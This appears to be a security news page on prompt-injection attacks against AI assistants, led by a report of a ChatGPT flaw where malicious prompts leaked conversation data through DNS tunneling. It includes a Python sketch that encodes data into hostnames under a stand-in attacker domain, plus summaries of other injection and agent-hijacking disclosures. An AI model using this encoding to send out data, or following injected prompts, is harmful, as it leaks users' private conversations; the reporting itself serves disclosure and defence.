ChatGPT Bug Let Malicious Prompts Exfiltrate Data via DNS
Check Point Research disclosed a ChatGPT vulnerability that abused DNS tunneling to silently steal conversation data. OpenAI patched the flaw on February 20, 2026.
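Check Point has not published exploit code, but DNS-tunneling exfiltration in general works by encoding stolen data into the labels of hostnames under an attacker-controlled domain, so that merely resolving the names leaks the payload to the attacker's nameserver. A minimal sketch of that encoding step (the domain name and helper function are hypothetical, not from the disclosure):

```python
import base64

def encode_for_dns(secret: str, attacker_domain: str, label_max: int = 63) -> list[str]:
    """Split data into DNS-label-sized chunks under an attacker-controlled domain.

    base32 is used because DNS labels are case-insensitive and limited to a
    small character set; each label may be at most 63 octets (RFC 1035).
    """
    encoded = base64.b32encode(secret.encode()).decode().rstrip("=").lower()
    chunks = [encoded[i:i + label_max] for i in range(0, len(encoded), label_max)]
    # Prefix each chunk with a sequence number so the receiver can reassemble.
    return [f"{i}.{chunk}.{attacker_domain}" for i, chunk in enumerate(chunks)]

hostnames = encode_for_dns("user conversation data", "attacker.example")
```

Any DNS lookup of these names, even through a recursive resolver, ultimately reaches the attacker's authoritative server, which is why this channel evades most egress filtering.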
6 articles tagged with "Prompt Injection"
LayerX researchers found that custom font rendering can hide malicious prompts from ChatGPT, Claude, Gemini, and other AI assistants while displaying them to users.
Cisco's State of AI Security 2026 report reveals a dangerous gap between agentic AI adoption ambitions and enterprise security readiness. Here's what the threat landscape looks like.
Varonis researchers disclosed a vulnerability chain that let attackers exfiltrate user data through Copilot with a single malicious link click. Microsoft has patched the issue.
OpenAI admits ChatGPT Atlas remains vulnerable to attacks that hijack AI agents through malicious web content. New defenses have been deployed, but the fundamental risk persists.
CVE-2025-68664 scores CVSS 9.3 and enables secret extraction and prompt injection in LangChain Core. Patch immediately if you're running AI agents.